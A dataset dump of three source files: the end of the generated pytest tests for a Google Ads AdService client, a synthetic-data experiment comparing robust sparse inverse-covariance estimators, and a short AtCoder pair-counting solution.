ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
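# Recap of the resolution rules these generated tests encode: a client cert is
# honoured only when GOOGLE_API_USE_CLIENT_CERTIFICATE is "true"; with
# GOOGLE_API_USE_MTLS_ENDPOINT set to "auto" the client switches to
# DEFAULT_MTLS_ENDPOINT only if a cert is actually available, "always" forces
# the mTLS endpoint, "never" keeps DEFAULT_ENDPOINT, and unsupported values
# raise MutualTLSChannelError (or ValueError for the cert variable).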
def test_ad_service_client_client_options_from_dict():
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_get_ad(transport: str = 'grpc', request_type=ad_service.GetAdRequest):
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_ad),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad.Ad(
resource_name='resource_name_value',
id=205,
final_urls=['final_urls_value'],
final_mobile_urls=['final_mobile_urls_value'],
tracking_url_template='tracking_url_template_value',
final_url_suffix='final_url_suffix_value',
display_url='display_url_value',
type_=ad_type.AdTypeEnum.AdType.UNKNOWN,
added_by_google_ads=True,
device_preference=device.DeviceEnum.Device.UNKNOWN,
name='name_value',
system_managed_resource_source=system_managed_entity_source.SystemManagedResourceSourceEnum.SystemManagedResourceSource.UNKNOWN,
text_ad=ad_type_infos.TextAdInfo(headline='headline_value'),
)
response = client.get_ad(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == ad_service.GetAdRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, ad.Ad)
assert response.resource_name == 'resource_name_value'
assert response.id == 205
assert response.final_urls == ['final_urls_value']
assert response.final_mobile_urls == ['final_mobile_urls_value']
assert response.tracking_url_template == 'tracking_url_template_value'
assert response.final_url_suffix == 'final_url_suffix_value'
assert response.display_url == 'display_url_value'
assert response.type_ == ad_type.AdTypeEnum.AdType.UNKNOWN
assert response.added_by_google_ads is True
assert response.device_preference == device.DeviceEnum.Device.UNKNOWN
assert response.name == 'name_value'
assert response.system_managed_resource_source == system_managed_entity_source.SystemManagedResourceSourceEnum.SystemManagedResourceSource.UNKNOWN
def test_get_ad_from_dict():
test_get_ad(request_type=dict)
def test_get_ad_field_headers():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = ad_service.GetAdRequest()
request.resource_name = 'resource_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_ad),
'__call__') as call:
call.return_value = ad.Ad()
client.get_ad(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'resource_name=resource_name/value',
) in kw['metadata']
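# The 'x-goog-request-params' entry asserted above is the standard GAPIC
# routing header: fields that form part of the resource path are mirrored into
# request metadata so the backend can route the call without parsing the body.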
def test_get_ad_flattened():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_ad),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad.Ad()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_ad(
resource_name='resource_name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource_name == 'resource_name_value'
def test_get_ad_flattened_error():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_ad(
ad_service.GetAdRequest(),
resource_name='resource_name_value',
)
def test_mutate_ads(transport: str = 'grpc', request_type=ad_service.MutateAdsRequest):
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_ads),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad_service.MutateAdsResponse(
)
response = client.mutate_ads(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == ad_service.MutateAdsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, ad_service.MutateAdsResponse)
def test_mutate_ads_from_dict():
test_mutate_ads(request_type=dict)
def test_mutate_ads_field_headers():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = ad_service.MutateAdsRequest()
request.customer_id = 'customer_id/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_ads),
'__call__') as call:
call.return_value = ad_service.MutateAdsResponse()
client.mutate_ads(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'customer_id=customer_id/value',
) in kw['metadata']
def test_mutate_ads_flattened():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_ads),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = ad_service.MutateAdsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.mutate_ads(
customer_id='customer_id_value',
operations=[ad_service.AdOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].customer_id == 'customer_id_value'
assert args[0].operations == [ad_service.AdOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))]
def test_mutate_ads_flattened_error():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.mutate_ads(
ad_service.MutateAdsRequest(),
customer_id='customer_id_value',
operations=[ad_service.AdOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = AdServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.AdServiceGrpcTransport,
)
@pytest.mark.parametrize("transport_class", [
transports.AdServiceGrpcTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_ad_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.AdServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'get_ad',
'mutate_ads',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
def test_ad_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default') as adc, mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AdServiceTransport()
adc.assert_called_once()
def test_ad_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
AdServiceClient()
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_ad_service_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transports.AdServiceGrpcTransport(host="squid.clam.whelk")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_ad_service_host_no_port():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com'),
)
assert client.transport._host == 'googleads.googleapis.com:443'
def test_ad_service_host_with_port():
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com:8000'),
)
assert client.transport._host == 'googleads.googleapis.com:8000'
def test_ad_service_grpc_transport_channel():
channel = grpc.insecure_channel('http://localhost/')
# Check that channel is used if provided.
transport = transports.AdServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
@pytest.mark.parametrize("transport_class", [transports.AdServiceGrpcTransport])
def test_ad_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
@pytest.mark.parametrize("transport_class", [transports.AdServiceGrpcTransport,])
def test_ad_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_ad_path():
customer = "squid"
ad = "clam"
expected = "customers/{customer}/ads/{ad}".format(customer=customer, ad=ad, )
actual = AdServiceClient.ad_path(customer, ad)
assert expected == actual
def test_parse_ad_path():
expected = {
"customer": "whelk",
"ad": "octopus",
}
path = AdServiceClient.ad_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_ad_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "oyster"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = AdServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nudibranch",
}
path = AdServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "cuttlefish"
expected = "folders/{folder}".format(folder=folder, )
actual = AdServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "mussel",
}
path = AdServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "winkle"
expected = "organizations/{organization}".format(organization=organization, )
actual = AdServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nautilus",
}
path = AdServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "scallop"
expected = "projects/{project}".format(project=project, )
actual = AdServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "abalone",
}
path = AdServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "squid"
location = "clam"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = AdServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "whelk",
"location": "octopus",
}
path = AdServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = AdServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.AdServiceTransport, '_prep_wrapped_messages') as prep:
client = AdServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.AdServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = AdServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
cb9b3aee824c57b21f29ee6facc88b380fc9eb68 | a0265b6b2350586a3c4e5b52c593129d291bb9ca | /synthetic/synthetic_cov.py | ee8285482027937aef0f48639349edfc68f94749 | [] | no_license | yowald/elliptical-losses | ed3ae0f58a49abecfa7dc76516e6e4ac969dee05 | 0497e4b6863f300e5d05f46d0704c786a59fa986 | refs/heads/master | 2020-08-28T17:57:06.604507 | 2020-01-04T16:22:53 | 2020-01-04T16:22:53 | 217,775,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,820 | py | """Functions to generate synthetic data and run experiment.
flags control number of variables, sparsity parameter, seed etc.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# from absl import app
# from absl import flags
import os
import sys
import numpy as np
import scipy as sp
from scipy.linalg import cho_factor
from scipy.linalg import LinAlgError
from sklearn.datasets import make_sparse_spd_matrix
import tensorflow as tf
from ..PositiveScalarSamplerFactory import PositiveScalarSamplerFactory
from ..structured_optimizers import GMRFOptimizer
from ..structured_optimizers import LossFunctionFactory
from ..structured_optimizers import structured_elliptical_maximum_likelihood
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('num_features', 10, '')
tf.app.flags.DEFINE_integer('seed', 1, '')
tf.app.flags.DEFINE_integer('num_steps_newton', 75000,
"""Number of steps for newton optimizer.""")
tf.app.flags.DEFINE_integer('num_steps_mm_newton', 1000,
"""Number of steps or newton in MM algorithm.""")
tf.app.flags.DEFINE_integer('num_steps_mm', 100,
"""Number of steps for MM algorithm.""")
tf.app.flags.DEFINE_boolean('delete_checkpoint', False,
"""Delete existing checkpoint and start fresh.""")
tf.app.flags.DEFINE_boolean('delete_existing', False,
"""Delete existing checkpoint and start fresh.""")
tf.app.flags.DEFINE_float('beta', 0.5,
"""shape for generalized gaussian data creation.""")
tf.app.flags.DEFINE_float('nu', 3.,
'degrees of freedom for multivariate-t'
'data creation.')
tf.app.flags.DEFINE_float('learning_rate', 0.05,
"""Train Validation fraction.""")
tf.app.flags.DEFINE_boolean('standardize_data', True,
"""If True, divides data by standard deviation.""")
tf.app.flags.DEFINE_float('outliers_std', 10., '')
tf.app.flags.DEFINE_float('outliers_samples_prob', 0.05, '')
tf.app.flags.DEFINE_float('sparsity_alpha', 0.85, '')
tf.app.flags.DEFINE_string('sampler_type', 'mggd',
"""scalar sampler type to use for data generation""")
tf.app.flags.DEFINE_string('save_dir',
'./elliptical-losses/synthetic/results/',
'Directory where to write event logs '
'and checkpoint.')
def is_pos_def(matrix):
return np.all(np.linalg.eigvals(matrix) > 0)
def get_sparse_high_correlations(dim=25, seed=1, rep_num=1000,
sparsity_alpha=0.9):
"""Gets sparse inverse covariance matrix.
  The method draws a few matrices and returns the one where the average
correlation between variables is the highest.
Args:
dim: the dimension of the matrix to be returned.
seed: seed for reproducibility.
rep_num: number of matrices to draw and choose from.
sparsity_alpha: sparsity parameter. see details of make_sparse_spd_matrix.
Returns:
A sparse inverse covariance matrix.
"""
np.random.seed(seed)
max_mean = 0
for _ in range(rep_num):
candidate_matrix = make_sparse_spd_matrix(dim, alpha=sparsity_alpha,
smallest_coef=.4, largest_coef=.7)
candidate_correlations = np.linalg.inv(candidate_matrix)
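    # Turn the candidate's covariance (the inverse of the drawn precision
    # matrix) into a correlation matrix: divide each row and each column by
    # the square root of the corresponding diagonal entry.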
diag_part = np.sqrt(np.expand_dims(np.diag(candidate_correlations), axis=0))
candidate_correlations /= diag_part
candidate_correlations /= diag_part.transpose()
cur_mean = np.tril(np.abs(candidate_correlations)).mean()
if max_mean < cur_mean:
best_candidate = candidate_matrix
max_mean = cur_mean
return best_candidate
def get_edge_indices_from_matrix(matrix, miss_probability=0.0):
"""Gets a list of indices where the entries in the given matrix are non-zero.
Each index is a list of two integers [i,j] such that matrix[i,j]!=0.
Args:
matrix: the matrix to get the edges of.
miss_probability: float in the range [0., 1.], edges will be omitted from
      the list with this probability.
Returns:
A list of indices (or edges so to speak).
"""
[n, _] = matrix.shape
edge_indices_triu = []
edge_indices_tril = []
for i in range(n-1):
for j in range(i+1, n):
if (np.abs(matrix[i, j]) > 0 and np.random.rand() > miss_probability):
edge_indices_triu.append([i, j])
edge_indices_tril.append([j, i])
edge_indices = np.array(edge_indices_triu + edge_indices_tril)
return edge_indices
def check_pd(matrix, lower=True):
"""Checks if matrix is positive definite.
Args:
matrix: input to check positive definiteness of.
lower: If True gets the lower triangular part of the Cholesky decomposition.
Returns:
If matrix is positive definite returns True and its Cholesky decomposition,
otherwise returns False and None.
"""
try:
return True, np.tril(cho_factor(matrix, lower=lower)[0])
  except LinAlgError as err:
    if 'not positive definite' in str(err):
      return False, None
    raise
def get_elliptic_data(scalar_sampler, n, m_train, seed=1, sparsity_alpha=0.9):
"""Generates data from an elliptic distribution.
Args:
scalar_sampler: a function that receives an integer m, and draws m positive
scalars from some distribution. the distribution defines the type of
elliptic distribution we are using.
See Frahm 04. https://kups.ub.uni-koeln.de/1319/
n: number of variables in the elliptic distribution.
m_train: number of training examples to draw from distribution.
seed: seed for the random number generator, for reproducibility purposes.
sparsity_alpha: sparsity parameter. see details of make_sparse_spd_matrix.
Returns:
    Training data, and the inverse covariance matrix it was generated with.
Raises:
Exception: if there was a problem with generating a covariance matrix, such
that the resulting matrix was not positive definite.
"""
np.random.seed(seed)
num_samples = m_train
inverse_cov = get_sparse_high_correlations(n, seed,
sparsity_alpha=sparsity_alpha)
inverse_cov = np.float32(inverse_cov)
covariance = np.linalg.inv(inverse_cov)
  if not check_pd(covariance)[0]:  # check_pd returns an (is_pd, cholesky) pair
raise Exception('covariance matrix is not Positive Definite')
spherical_uniform = np.random.randn(n, num_samples)
spherical_uniform /= np.linalg.norm(spherical_uniform, axis=0)
scaling_params = scalar_sampler(num_samples)
train_data = np.multiply(scaling_params.T,
sp.linalg.sqrtm(covariance).dot(spherical_uniform))
return train_data, inverse_cov
def get_losses_dictionary(features_dimension):
"""Creates a dictionary with all the losses to test, and their gradients.
Args:
features_dimension: the dimension of the inverse covariance matrix we are
estimating.
Returns:
A dictionary where the keys are the names of the losses to estimate and the
values are tuples of (loss, grad) where loss is the loss function and grad
is its gradient.
"""
loss_factory = LossFunctionFactory()
loss_dict = {
'tyler': loss_factory.tylers_estimator({'d': features_dimension}),
'gen_gauss_0_2': loss_factory.generalized_gaussian({
'm': (features_dimension)**((0.2-1)/0.2),
'beta': 0.2
}),
'gen_gauss_0_5': loss_factory.generalized_gaussian({
'm': (features_dimension)**((0.5-1)/0.5),
'beta': 0.5
}),
'multivariate_t': loss_factory.multivariate_t({
'nu': 3.,
'd': features_dimension
})
}
return loss_dict
def get_distance_from_ground_truth(ground_truth_matrix, estimation, std=None):
"""Calculates an normalized distance of estimation and ground truth matrix.
Args:
ground_truth_matrix: the true inverse covariance matrix we are estimating.
estimation: the estimation of the matrix.
std: if not None, it is the standard deviation of each feature in the
      training data. This is used to restore the original scales of the features
before measuring the distance between matrices.
Returns:
    The normalized Frobenius distance (i.e. Frobenius distance divided by
    the Frobenius norm of ground_truth_matrix) between normalized versions of
    estimation and ground_truth_matrix. Normalization is done by dividing
    estimation by its trace and multiplying by that of ground_truth_matrix.
"""
if std is not None:
diag_of_stds = np.linalg.inv(np.diag(std))
estimation = diag_of_stds.dot(estimation).dot(diag_of_stds)
estimation *= (np.trace(ground_truth_matrix)/np.trace(estimation))
distance_between_normalized = np.linalg.norm(estimation - ground_truth_matrix)
return distance_between_normalized/np.linalg.norm(ground_truth_matrix)
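# Sanity check implied by the trace renormalization above: if `estimation`
# differs from the ground truth only by a positive scale factor, the rescaling
# by trace(ground_truth_matrix)/trace(estimation) undoes it exactly and the
# returned relative distance is 0.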
def run_experiment(data_train, edge_indices_with_diag, inverse_covariance,
seed, sampler_type, sampler_param, sparsity_alpha,
num_steps_newton, num_steps_mm_newton, num_steps_mm,
standardize_data=True):
"""Runs a single experiment comparing all losses on generated data.
Args:
data_train: the generated data to run on.
edge_indices_with_diag: list of edges to use for the graphical structure.
An edge is itself a list of two integers in the range [0..num_features-1].
      Should include self edges (i.e. [i,i]) for diagonal elements of the inverse
covariance.
inverse_covariance: the ground truth inverse covariance matrix used to
generate the data.
seed: the seed used in generation of the data, for logging purposes.
sampler_type: the type of sampler used to generate the data (see
PositiveScalarSamplerFactory)
sampler_param: parameter for the scalar sampler (shape for mggd and degrees
of freedom for t-distribution)
sparsity_alpha: sparsity parameter. see details of make_sparse_spd_matrix.
num_steps_newton: maximum number of steps for newton optimizer in structured
gmrfs.
num_steps_mm_newton: maximum number of steps for inner loop newton optimizer
in minimization majorization of structured robust mrfs.
num_steps_mm: maximum number of minimization majorization steps in robust
mrfs.
standardize_data: if True, divides training data by standard deviations
before passing to structured optimizers.
"""
[num_features, m_train] = data_train.shape
tf.logging.info('==== seed={}, m_train={},'.format(seed, m_train))
# Create directory to save results.
full_dir = os.path.join(FLAGS.save_dir, '%d_%d' %
(num_features, m_train))
full_dir = os.path.join(full_dir, '%d' % (seed))
if sampler_type == 'mggd':
full_dir = os.path.join(full_dir,
'%s_beta_%0.2f' % (sampler_type, sampler_param))
elif sampler_type == 'multivariate_t':
full_dir = os.path.join(full_dir,
'%s_nu_%0.2f' % (sampler_type, sampler_param))
full_dir = os.path.join(full_dir, '%0.2f' % (sparsity_alpha))
if tf.gfile.Exists(full_dir):
if FLAGS.delete_existing:
tf.gfile.DeleteRecursively(full_dir)
tf.gfile.MakeDirs(full_dir)
# Standardize data and keep stds
std_val = None
if standardize_data:
std_val = np.std(data_train, axis=1)
data_train_ = data_train/np.std(data_train, axis=1, keepdims=True)
else:
data_train_ = data_train
# Sample Covariance
sample_cov = data_train.dot(data_train.T)/m_train
inverse_sample_cov = np.linalg.pinv(sample_cov)
sample_cov_err = get_distance_from_ground_truth(inverse_covariance,
inverse_sample_cov,
std=None)
# Save results for sample covariance estimator.
fname = os.path.join(full_dir, '%s.npy' % 'sample_cov_err')
print('fname', fname)
with tf.gfile.Open(fname, 'w') as fp:
print(sample_cov_err)
np.save(fp, sample_cov_err)
# Gaussian MRF
gmrf_optimizer = GMRFOptimizer(num_features, edge_indices_with_diag)
estimate_gmrf, _ = (
gmrf_optimizer.alt_newton_coord_descent(data_train_,
max_iter=num_steps_newton))
gmrf_err = get_distance_from_ground_truth(inverse_covariance, estimate_gmrf,
std=std_val)
fname = os.path.join(full_dir, '%s.npy' % 'gmrf_err')
print('fname', fname)
with tf.gfile.Open(fname, 'w') as fp:
print(gmrf_err)
np.save(fp, gmrf_err)
n_steps_newt = num_steps_mm_newton
loss_dict = get_losses_dictionary(num_features)
for estimator_name, (loss, loss_grad) in loss_dict.items():
estimate_cur, _ = (
structured_elliptical_maximum_likelihood(data_train_, loss, loss_grad,
edge_indices_with_diag,
initial_value=None,
max_iters=num_steps_mm,
newton_num_steps=n_steps_newt))
cur_err = get_distance_from_ground_truth(inverse_covariance, estimate_cur,
std=std_val)
fname = os.path.join(full_dir, '%s.npy' % (estimator_name+'_err'))
print('fname', fname)
with tf.gfile.Open(fname, 'w') as fp:
print(cur_err)
np.save(fp, cur_err)
def main(argv):
del argv # Unused.
tf.logging.set_verbosity(tf.logging.INFO)
seed = FLAGS.seed
num_features = FLAGS.num_features
num_steps_newton = FLAGS.num_steps_newton
num_steps_mm_newton = FLAGS.num_steps_mm_newton
num_steps_mm = FLAGS.num_steps_mm
sparsity_alpha = FLAGS.sparsity_alpha
sampler_type = FLAGS.sampler_type
standardize_data = FLAGS.standardize_data
beta = FLAGS.beta
nu = FLAGS.nu
# Get the scalar sampler for generating elliptic data
scalar_sampler_factory = PositiveScalarSamplerFactory()
if sampler_type == 'mggd':
assert(beta <= 1 and beta > 0)
sampler_param = beta
gen_gauss_sampler_params = {'shape': beta, 'dim': num_features}
scalar_sampler = \
scalar_sampler_factory.generalized_gaussian(gen_gauss_sampler_params)
elif sampler_type == 'multivariate_t':
assert nu > 2
sampler_param = nu
multi_t_sampler_params = {'nu': nu, 'dim': num_features}
scalar_sampler = \
scalar_sampler_factory.multivariate_t(multi_t_sampler_params)
else:
raise ValueError('Unrecognized sampler type')
# Create training data and ground truth parameters.
m_train_max = 1500
np.random.seed(seed)
data_train, inverse_cov = get_elliptic_data(scalar_sampler, num_features,
m_train_max, seed=seed,
sparsity_alpha=sparsity_alpha)
edge_indices = get_edge_indices_from_matrix(inverse_cov)
edge_indices = np.concatenate([edge_indices,
[[i, i] for i in range(num_features)]])
m_trains = [30, 40, 50, 60, 70, 80, 100, 150, 250, 500, 850]
for m in m_trains:
np.random.seed(seed)
train_inds = np.random.permutation(m_train_max)[:m]
data_train_cur = data_train[:, train_inds]
print('==== n={}, seed={}, m_train={}, sparsity_alpha={}'
', distribution_beta={}'.format(num_features, seed, m, sparsity_alpha,
beta))
run_experiment(data_train_cur, edge_indices, inverse_cov, seed,
sampler_type, sampler_param, sparsity_alpha,
num_steps_newton, num_steps_mm_newton, num_steps_mm,
standardize_data=standardize_data)
if __name__ == '__main__':
tf.app.run(main)
| [
"[email protected]"
] | |
8284303e2d78a6089a9fd4c7ccbb37454b2e67c4 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /atcoder/abc200_c.py | e206350c17a0371913a9b0f7696b9550c9039895 | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # https://atcoder.jp/contests/abc200/tasks/abc200_c
from collections import Counter
n = int(input())
a = list(map(int, (input().split())))
for i in range(n):
a[i] %= 200
cnt = Counter(a)
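# A_i - A_j is divisible by 200 exactly when A_i and A_j share a residue
# mod 200, so the answer is the sum of C(v, 2) = v*(v-1)//2 over the size v
# of each residue class.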
ans = 0
for i, v in cnt.items():
if v>=2:
ans += v*(v-1) // 2
print(ans)
| [
"[email protected]"
] | |
